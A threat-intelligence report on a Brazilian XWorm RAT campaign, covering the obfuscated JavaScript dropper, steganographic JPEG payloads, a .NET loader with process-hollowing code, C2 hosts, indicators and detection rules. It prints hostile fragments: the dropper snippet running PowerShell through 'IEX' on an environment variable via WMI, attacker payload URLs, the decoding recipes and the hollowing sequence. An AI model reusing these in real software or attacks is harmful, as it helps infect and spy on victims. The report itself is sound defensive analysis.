Brazilian XWorm Operator Ships a Loader Named Fiber.Program Running HackForums Process-Hollowing Code — Campaign NkShHr7reN

PublishedApril 7, 2026

xwormlatambrazilbabel-obfuscatorprocess-hollowinghackforumssteganographycaspol-injectionddns-abusehostinger

TL;DR

On April 7, 2026, MalwareBazaar reporter johnk3r submitted 4c05a4f5… — a 7z archive containing a 2MB obfuscated JavaScript dropper. The kill chain that unfolded is worth writing up in its own right:

7z → obfuscated JS (11k lines of Unicode-noise padding)
   → PowerShell (stored in the INTERNAL_DB_CACHE env var, executed via WMI Win32_Process.Create)
   → fake JPEG from magina.online (steganographic base64 between INICIO== and FIM markers — Portuguese)
   → .NET loader Fiber.Program (Babel-obfuscated, masquerading as Microsoft.Win32.TaskScheduler v2.12.2.0)
   → XWorm RAT (XClient variant) process-hollowed into Caspol.exe
   → C2: alzap.ddns.com.br on a Brazilian Telefonica residential IP

Four things make this campaign novel enough to write up:

Fresh, live C2 infrastructure registered April 6, 2026 — less than 48 hours old, actively serving 2MB+ payloads at time of analysis. Campaign ID NkShHr7reN, mutex mUZGaw4DvK.
The loader (Fiber.Program) embeds literal HackForums process-hollowing code — the namespace HackForums.gigajew.x64 in the decompiled .NET assembly is code reuse from HackForums user gigajew, whose public RunPE posts are now running in a real XWorm campaign. We haven't seen that specific code lineage called out in a published XWorm writeup before, but we're not claiming it's a first — just worth flagging as a pivot point.
The attacker left their C2 MariaDB (port 3306) and FTP (port 21) exposed to the internet — plus a sprawling directory of /c2, /shell, /implants, /agents, /beacon, and /admin endpoints behind 301 redirects. This is a brand-new operator with a brand-new Hostinger VPS and no operational hygiene.
Brazilian attribution signals are overwhelming: Portuguese steganography markers (INICIO== / FIM), Portuguese function name VerificarMinutos ("Check Minutes") in the loader, a Brazilian DDNS provider (BluePex/Winco), and a residential Telefonica Brasil (Vivo, AS18881) IP as the final C2 callback. The Hostinger staging node is in Lithuania; the operator is in Brazil.

We've notified Hostinger abuse for magina.online / 89.116.115.88, Telefonica Brasil abuse for 191.34.194.67, and BluePex for the abused DDNS record. C2 confirmed live at time of writing.

Prior Art

XWorm is not a new malware family. It's been tracked publicly since 2022, when it began appearing on Telegram-based malware-as-a-service marketplaces. The most relevant public research:

Date	Source	Finding
2023-09	The Hacker News	"Inside XWorm: Decoding the Stealthy Tactics of the Latest Variant"
2024	Todyl	"XWorm Part 2: Breaking Down the .NET Loader and v4.0" — closest public parallel to Fiber.Program but does not name the loader or identify the HackForums code lineage
2025	Picus Security	"XWorm Rises Again: Dissecting the Modular Malware's V6 Resurrection"
2025-11	Trellix	"XWorm's Evolving Infection Chain: From Predictable to Deceptive" — v7.2 release
2025-12	FortiGuard	Multi-themed phishing, Equation Editor CVE-2018-0802 abuse
2026	Trellix	"Old Loader, New Threat"
2026	CSO Online	Fileless XWorm phishing chain

Separately, the HackForums.gigajew namespace used inside the Fiber.Program loader traces back to the user gigajew on HackForums, whose RunPE / process-hollowing code has been circulating in that community's reverse engineering runpe/process hollowing thread lineage. That code has been reused in many unrelated projects over the years.

What this report adds to the public record:

Names the Fiber.Program loader and documents its 19-parameter Main() config surface
Documents the NkShHr7reN campaign ID and mUZGaw4DvK mutex
Maps the live C2 infrastructure — magina.online (89.116.115.88, Hostinger LT) and alzap.ddns.com.br (191.34.194.67, Telefonica BR)
Calls out the HackForums gigajew RunPE code lineage inside the live XWorm loader as a pivot point for researchers
Brazilian operator attribution via multi-signal correlation
Documents the operator's exposed MariaDB and FTP services on their own C2 host

If you've seen prior reporting on any of the above and we missed it, please reach out — we'll update this post and credit the earlier source.

Stage 1 — The JavaScript Dropper

Property	Value
7z SHA256	`2261c2a0b9ca14f1f68d83e8bc3f660a681a385b1932945fa826f0be89d39939`
7z filename	`4c05a4f5…7.7z` (password: `infected`)
JS SHA256	`4c05a4f514bbc7f84b397abfe571c9c34505b0d142a0e8e13a981c8ffb194857`
JS MD5	`10def5076c990b1970ac71cd85fdade1`
JS size	2,147,544 bytes
First seen	2026-04-07 12:59:33 UTC
Reporter	johnk3r (MalwareBazaar)
MB tags	`7z`, `alzap-ddns-com-br`, `latam`, `magina-online`, `xworm`

The dropper is a 2.1 MB WSH JScript file that weighs in at 11,698 lines, of which roughly 11,000 are noise. It uses a three-layer obfuscation scheme:

Unicode character separators. Two distinct garbage patterns — ᰦ኉؁⡗ᕨ and ŪՋ೷ሀ⎚🔨➍ᩎ⌵ⲩᎳ඄Ϟ⥗ᢦ — are interleaved between the actual payload characters. The separators defeat basic regex-based signature matching that assumes printable ASCII.
A digammate() helper that is just concatenation. digammate(a, b, c) returns b + a.slice(1) + c. It exists solely to make control flow look complex in a debugger.
A gerenda string builder that assembles the real payload one character at a time across thousands of lines, each line looking identical in a side-by-side diff but actually differing in which Unicode separator was chosen.

The deobfuscated payload does something clever with environment variables:

// Store the decoded PowerShell in a user-scoped env var named after a plausible
// Windows Defender artifact ("INTERNAL_DB_CACHE") so the command line doesn't
// carry the script.
FightWireImages.Environment("User")("INTERNAL_DB_CACHE") = antisilverite(suspiciency);

// Then invoke powershell.exe via WMI Win32_Process.Create, passing a short one-liner
// that expands the env var:
var proposing = 'powershell.exe -ExecutionPolicy Bypass -NoProfile '
              + '-WindowStyle Hidden -Command "IEX $env:INTERNAL_DB_CACHE"';
gesturality.Get("Win32_Process").Create(proposing, null, perineptunium, drumble);

Why this matters for defenders: most command-line telemetry tools will record powershell.exe -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "IEX $env:INTERNAL_DB_CACHE" as the full command — they won't have the contents of INTERNAL_DB_CACHE. Unless your EDR is snapshotting process-scoped environment variables at process creation, you lose the payload at the command-line layer. Detect: alert on any PowerShell invocation that IEX-evaluates an environment variable whose name is not in an allowlist.

Stage 2 — `Fiber.Program`, the Babel-Obfuscated Loader

The PowerShell stage fetches https://magina.online/MSI_111454.png, which is a valid 3840×2160 progressive JPEG (it renders in a browser) with a base64 payload hidden between the markers IN- and -in1. The extraction recipe:

1. Read bytes between IN- and -in1
2. Reverse the string
3. Replace every '#' character with 'A'
4. base64-decode

The result is a 1,161,216-byte .NET DLL. Loaded via [AppDomain]::CurrentDomain.Load(), it presents itself to tools like ilspy as Microsoft.Win32.TaskScheduler v2.12.2.0 — the legitimate dahall/taskscheduler community library, which has been merged into the assembly to provide cover. Inside it is a second namespace: Fiber.Program.

Assembly metadata

File Type:   PE32 DLL (.NET assembly)
Framework:   .NETFramework v4.5
Runtime:     v4.0.30319
Namespace:   Fiber
Class:       Program
Disguised:   Microsoft.Win32.TaskScheduler v2.12.2.0 (GitHub: dahall/taskscheduler)
Obfuscator:  Babel Obfuscator (e4 variant)

Decompiling with ilspycmd produces 172,858 lines of C# — the vast majority of which is obfuscation overhead, not real logic.

The 19-parameter entry point

The loader's Main() is a configuration-driven component designed to be reused across campaigns:

public static void Main(
    string encodedUrlPayload,    // URL to download (MSI_111454.png)
    string flagRegStartup,       // Enable HKCU Run key persistence
    string vbsPath,              // VBS wrapper path
    string vbsName,              // VBS wrapper filename
    string clrPath,              // CLR host path
    string nativeDllPath,        // Native DLL path
    string nativeDllName,        // Native DLL filename
    string flagTaskPersistence,  // Enable Scheduled Task persistence
    string payloadUrl,           // Secondary payload URL (img_152603.png = XWorm RAT)
    string outputPath,           // Drop directory (C:\Users\Public\Downloads\)
    string outputName,           // Dropped filename
    string fileExt,              // "js"
    string intervalMinutes,      // Scheduled task interval (13 min)
    string flagStartupTask,      // Enable Startup folder task
    string schedulerTaskName,    // Task name — here: NkShHr7reN (campaign ID)
    string vmDetectionName,      // VM detection profile
    string flagUacStart,         // Enable UAC bypass
    string uacPayloadUrl,        // UAC bypass payload URL
    string uacCommand            // UAC command
)

This is not a one-off XWorm installer. It's a builder-generated loader with every persistence toggle, every URL, every target name, and every campaign ID fed in as a string parameter. The same binary could ship 50 campaigns with zero recompilation.

The literal HackForums code lineage

Buried inside the Fiber.Program loader is a namespace that made us do a double-take:

Namespace: HackForums.gigajew
Class:     x64
Method:    x64.Load(byte[] payloadBuffer, string host, string args)

Load() implements a textbook process hollowing sequence:

CreateProcess (CREATE_SUSPENDED)
  → ZwUnmapViewOfSection(target base)
  → VirtualAllocEx(target, payload size, RWX)
  → WriteProcessMemory(target, payload bytes)
  → SetThreadContext / GetThreadContext
  → ResumeThread
  → CloseHandle

The injection target is hardcoded: Caspol.exe — the .NET Code Access Security Policy tool, which is present on every Windows system with the .NET Framework and which nobody has a legitimate reason to see making outbound HTTPS calls. It's a classic signed-binary proxy.

Why the HackForums namespace is interesting: the HackForums user gigajew (uid=537383) has been posting about RunPE / process hollowing in that forum's reverse engineering runpe/process hollowing community threads. The namespace HackForums.gigajew.x64 is not a subtle homage; it is the literal C# namespace the HackForums user published their code under, copy-pasted into a live XWorm campaign without even renaming. This is the sort of OPSEC sloppiness that makes attribution easier — the operator lifted a public forum post verbatim, which tells us two things:

The operator is a code-reuse actor, not a from-scratch developer. They are assembling components from public sources.
The HackForums forum is still a functional supply chain for malware components in 2026. That thread needs to be on every CTI researcher's radar.

Anti-analysis stack

The Fiber.Program loader ships with a full defensive suite:

Technique	Implementation
VM detection	`VirtualMachineDetector` class — SMBIOS vendor strings, WMI `Win32_ComputerSystem.IsVirtual`, process/service enumeration (vbox, vmware, vmtools)
Anti-debug	`CheckRemoteDebuggerPresent`, `IsDebuggerPresent`, `NtQueryInformationProcess(ProcessDebugPort)`, `System.Diagnostics.Debugger.IsAttached`
Anti-profiler	Reads `COR_PROFILER` and `COR_ENABLE_PROFILING` environment variables at startup
Analysis-tool detection	Enumerates running processes for `dnspy`, `vsdbg`, `de4dot`, `smoketest`, `babelvm`, `AssemblyServer`, `SimpleAssemblyExplorer`
Anti-tamper	PE section integrity verification → `Environment.FailFast(null)` on any mismatch
String encryption	Encrypted resource `vTFM` (17,635 bytes) — XOR with a rotating 6-byte key, decrypted at runtime via dynamic IL method generation

The Environment.FailFast(null) on tamper detection is a particularly aggressive choice — it skips all finalizers and crash handlers, making post-mortem analysis harder than a plain Process.Kill.

The Portuguese tell

Inside the loader, alongside all the obfuscated symbol names, sits a helper class with an unobfuscated method name:

public static class Class15
{
    public static void VerificarMinutos(...)  // "Check Minutes" (Portuguese)
}

VerificarMinutos is the scheduled-task-interval helper that feeds into the Babel-wrapped persistence code. The developer forgot to rename it during obfuscation — or rather, Babel's symbol renamer only renames compiler-generated symbols, not the developer's public API surface. For our purposes, it's a cleartext Portuguese function name in a commercial-obfuscated .NET loader, which is an attribution signal that would be hard to fake.

Stage 3 — The XWorm RAT (XClient variant)

The Fiber.Program loader then fetches https://magina.online/img_152603.png, a second steganographic JPEG. This time the markers are INICIO== and FIM (Portuguese for "start" and "end") — another Portuguese tell in the same kill chain. Extraction recipe:

1. Read bytes between INICIO== and FIM
2. Replace every '#' character with 'A'
3. Reverse the string
4. base64-decode

The payload is a 52,227-byte XWorm RAT (the "XClient" variant). Its PE is deliberately corrupted:

e_lfanew pointer zeroed (should point to the PE header at offset 0xFE)
All .NET metadata stream sizes zeroed
#Strings table interspersed with 2-4 character garbage strings (vV%6W'f, 6WE, 7FV) to defeat string-extraction tooling
No recoverable #US (User Strings) table — all config values encrypted

This PE won't load without the loader's bootstrap, which fixes up the headers in memory before handing control to the entry point. This is a common XWorm tactic documented in the Todyl report, but the specific corruption pattern here is a fingerprint we can pivot on.

Recovered capability strings (from the partially-reconstructed metadata):

Spread                     # USB / network propagation
Antivirus                  # AV enumeration / evasion
Hidden                     # Stealth mode
ReportWindow               # Active-window reporting
capGetDriverDescriptionA   # Webcam capture
PreventSleep               # Keep-alive
RunDisk                    # Disk operations
OpenUrl                    # Browser manipulation / drive-bys
RijndaelManaged            # AES-ECB with MD5-derived key
MD5CryptoServiceProvider   # Key derivation
CreateMutex                # Single-instance
RegistryKey / CreateSubKey / DeleteSubKey  # Persistence
Caspol                     # Injection target (hardcoded)
XClient                    # Variant identifier

This is the standard XWorm capability set — nothing exotic at the RAT layer. The novelty is everywhere upstream of the RAT: the loader, the steganography, the HackForums code reuse, the Brazilian OPSEC tells.

The C2 Infrastructure

Primary: `magina.online` → `89.116.115.88`

A staging node on Hostinger VPS (AS47583, Lithuania) — registered one day before first sighting.

Field	Value
Domain	`magina.online`
IP	`89.116.115.88`
ASN	AS47583 AS-HOSTINGER, CY/LT
CIDR	`89.116.115.0/24`
Registrar	Hostinger (UAB)
Created	2026-04-06 13:54:50 UTC
NS	`helios.dns-parking.com`, `aster.dns-parking.com` (Hostinger parking — default, no custom DNS)
TLS	Let's Encrypt R13, issued 2026-04-06 13:03:19 UTC — 51 minutes before the domain was registered
Serial	`06FF68038E2E05EEAA25269910EBE15E4AA7`
Web server	LiteSpeed httpd
Database	MariaDB 11.8.6-log — port 3306 exposed to the internet
FTP	Port 21 exposed to the internet (`220 FTP Server ready.`)
WHOIS privacy	ICANN RDDS redacted (Tucows Registry)

The TLS certificate being issued before the domain registration is unusual but not impossible — Hostinger's default provisioning flow can pre-issue a cert the moment DNS points at their load balancer. What it tells us is that the operator used Hostinger's turnkey VPS provisioning wizard, not a custom deployment.

The exposed MariaDB and FTP are the real story. A professional operator would firewall those. This person didn't. During the blitz dump, GHOST observed:

MariaDB 11.8.6-log banner on port 3306 (mysql_native_password auth enabled)
FTP on port 21 responding with a bare 220 FTP Server ready.
A sprawling 200+ endpoint inventory behind 301 redirects: /c2, /shell, /implants, /agents, /tasks, /beacon, /admin, /panel, /dashboard, /console, /check-in, /callback, /exec, /upload, /download, /payload, /api/*, /graphql, /webhook, /api/datasources, /api/v1/targets, /metrics, /phpmyadmin, /adminer, /mysqladmin, /pma
/.git/config, /.git/HEAD, /.svn/entries, /.svn/wc.db present but 403 — meaning a repository exists, just not yet leaked

This is somebody running a malware operation out of a $5/month Hostinger VPS with default configs. It is exactly the pattern we see with new LATAM operators who are graduating from running samples on their laptop to a public IP for the first time.

Secondary (the actual RAT C2): `alzap.ddns.com.br` → `191.34.194.67`

The XWorm RAT payload, once decrypted, points at a completely different host:

Field	Value
Domain	`alzap.ddns.com.br`
IP	`191.34.194.67`
ASN	AS18881 TELEFONICA BRASIL S.A
CIDR	`191.34.192.0/19`
ISP	Telefonica Brasil / Vivo (largest ISP in Brazil)
Classification	Residential
DDNS Provider	BluePex / Winco (`ddns.com.br` — Brazilian DDNS service)
DDNS Owner	BluePex Controle e Seguranca em TI Ltda

This is a Brazilian residential IP with a Brazilian DDNS service. The operator is running the final C2 from their home internet connection in Brazil, using a Brazilian commercial DDNS provider to handle the dynamic IP. That's not an OPSEC choice — that's an inability to afford or configure a bulletproof host for the callback side of the operation.

The magina.online Hostinger VPS is only the staging/distribution layer. The RAT itself phones home to the operator's house.

Brazilian Operator Attribution

We have five independent signals putting the operator in Brazil:

Portuguese steganography markers: INICIO== / FIM in the second-stage JPEG
Portuguese unobfuscated function name: Class15.VerificarMinutos ("Check Minutes") survived Babel's symbol renamer
Brazilian DDNS service: alzap.ddns.com.br is a BluePex/Winco DDNS — a Brazilian company serving Brazilian customers
Brazilian residential ISP: Telefonica Brasil (Vivo) AS18881 for the RAT callback IP
MalwareBazaar latam tag: the reporter (johnk3r) classified it as LATAM-targeted based on the domains and language markers

Each signal is individually weak. Together they're strong — the loader Babel-obfuscated everything except the Portuguese method name, which means the developer wrote Portuguese natively and never considered it a leak.

MITRE ATT&CK Mapping

Tactic	Technique	ID
Initial Access	Phishing: Spearphishing Attachment	T1566.001
Execution	Command and Scripting Interpreter: JavaScript	T1059.007
Execution	Command and Scripting Interpreter: PowerShell	T1059.001
Execution	Windows Management Instrumentation	T1047
Execution	User Execution: Malicious File	T1204.002
Persistence	Scheduled Task/Job	T1053.005
Persistence	Registry Run Keys / Startup Folder	T1547.001
Defense Evasion	Obfuscated Files or Information	T1027
Defense Evasion	Process Injection: Process Hollowing	T1055.012
Defense Evasion	Masquerading: Match Legitimate Name	T1036.005
Defense Evasion	Virtualization/Sandbox Evasion	T1497
Defense Evasion	Execution Guardrails: Environmental Keying	T1480.001
Command and Control	Encrypted Channel	T1573.001
Command and Control	Application Layer Protocol: Web Protocols	T1071.001
Command and Control	Dynamic Resolution (DDNS)	T1568.002
Command and Control	Ingress Tool Transfer	T1105
Collection	Screen Capture	T1113
Collection	Video Capture	T1125
Lateral Movement	Replication Through Removable Media	T1091

Indicators of Compromise

File hashes (SHA256)

2261c2a0b9ca14f1f68d83e8bc3f660a681a385b1932945fa826f0be89d39939  7z archive
4c05a4f514bbc7f84b397abfe571c9c34505b0d142a0e8e13a981c8ffb194857  JS dropper
53c3e0f8627917e8972a627b9e68adf9c21966428a85cb1c28f47cb21db3c12b  Fiber.Program loader (.NET DLL)
7c18dfe88698ad11830089f35f2fbc3f9773a549b5a7cb2597deb0d7fcbce9d3  XWorm XClient RAT
6bce2dd7b61a662650ffa16e886d1f3da01377841882bbcc4081305d17b14f57  MSI_111454.png (Fiber.Program carrier)
ccd5d5e9619538b82a6b8e194f180cf084bc1a20cdd39e447c3f73264c3330e9  img_152603.png (XWorm carrier)

Network

magina.online                  # Stage 2/3 payload distribution (Hostinger LT)
alzap.ddns.com.br              # XWorm RAT C2 (Telefonica BR residential)
89.116.115.88                  # magina.online
191.34.194.67                  # alzap.ddns.com.br

https://magina.online/MSI_111454.png   # Fiber.Program loader carrier
https://magina.online/img_152603.png   # XWorm RAT carrier
https://magina.online/bkp              # Persistence script

TLS

Issuer:  Let's Encrypt R13
CN:      magina.online
Serial:  06FF68038E2E05EEAA25269910EBE15E4AA7
Valid:   2026-04-06 13:03:19 UTC → 2026-07-05

Host / Behavioral

Env var:       INTERNAL_DB_CACHE             # PowerShell payload staging
Mutex:         mUZGaw4DvK
Campaign ID:   NkShHr7reN
Drop path:     C:\Users\Public\Downloads\
Injection:     Caspol.exe (.NET CAS Policy tool — signed Microsoft binary)
Scheduled task name: NkShHr7reN
.NET namespace: Fiber.Program (disguised as Microsoft.Win32.TaskScheduler v2.12.2.0)
Code-reuse tell: HackForums.gigajew.x64.Load() — process hollowing lifted from HF user gigajew
Portuguese tells: Class15.VerificarMinutos(), INICIO==/FIM stego markers

Suricata / detection pivots

Alert on powershell.exe invocations that IEX an environment variable matching INTERNAL_DB_CACHE (or any non-allowlisted env var)
Alert on any TLS SNI containing magina.online or ddns.com.br
Alert on any Caspol.exe process with a parent that is not msbuild.exe / vstest.exe / developer tooling (especially with outbound HTTPS)
YARA pivots on the Fiber.Program loader can key on:
- Method Class15.VerificarMinutos
- Namespace HackForums.gigajew
- Embedded resource vTFM of size 17,635 bytes
- The 19-parameter Main() signature

Disclosure Timeline

Date	Action
2026-04-06 13:03 UTC	Let's Encrypt cert issued for `magina.online`
2026-04-06 13:54 UTC	`magina.online` registered via Hostinger (UAB)
2026-04-06 14:14 UTC	`MSI_111454.png` (Fiber.Program carrier) uploaded
2026-04-06 18:25 UTC	`img_152603.png` (XWorm carrier) uploaded
2026-04-07 12:59 UTC	Sample first seen on MalwareBazaar (reporter: johnk3r)
2026-04-07 13:10 UTC	GHOST investigation kicks off; C2 payloads confirmed live
2026-04-07 14:20 UTC	GHOST blitz dump: exposed MariaDB, FTP, C2 endpoint inventory
2026-04-07	Notify Hostinger abuse (`abuse@hostinger.com`) re: `89.116.115.88` / `magina.online`
2026-04-07	Notify Telefonica Brasil abuse re: `191.34.194.67` (CGI.br / CERT.br)
2026-04-07	Notify BluePex/Winco re: `alzap.ddns.com.br`
2026-04-07	Public disclosure (this post)

Why This Matters

This report is not about a new XWorm variant — the RAT itself is stock. It's about what happens around the RAT:

A new Brazilian operator is using HackForums public RunPE code verbatim, which means the HackForums RunPE thread is still a live supply-chain source for LATAM malware authors in 2026. Threat hunters should be pivoting on HackForums.gigajew and its sibling namespaces across sample corpora to see what else is reusing it.
The Fiber.Program loader is builder-generated — the 19-parameter Main() config surface strongly suggests there is a builder tool somewhere (likely in Portuguese-speaking private forums) emitting these loaders. If you can find the builder, you can fingerprint every loader it ever generated. The resource name vTFM (17,635 bytes) is a great pivot point.
Brazilian XWorm activity continues to be underreported relative to the volume we observe. The combination of Portuguese language markers + BluePex DDNS + residential Telefonica C2 is a strong fingerprint for LATAM XWorm. Defenders in Brazil/Portugal should consider adding *.ddns.com.br to their watchlist alongside the more commonly tracked *.duckdns.org / *.no-ip.org.
The operator's own infrastructure is exposed. MariaDB on 3306, FTP on 21, and a documented directory of C2 endpoints on the same Hostinger VPS as the malware distribution. This operator will be deanonymized within days if a competent researcher takes a serious run at the MariaDB credentials or the exposed filesystem. We are not doing that here (unauthorized access), but we are documenting the exposure so that LE or a CERT with legal authority can.

Credits

Sample reporter: johnk3r (MalwareBazaar)
Prior art on XWorm loaders: Todyl, Trellix, Picus, FortiGuard, The Hacker News
HackForums code lineage: HF user gigajew (uid=537383)
Investigation: GHOST automated operator → Breakglass Intelligence

GHOST — Breakglass Intelligence. One indicator. Total infrastructure.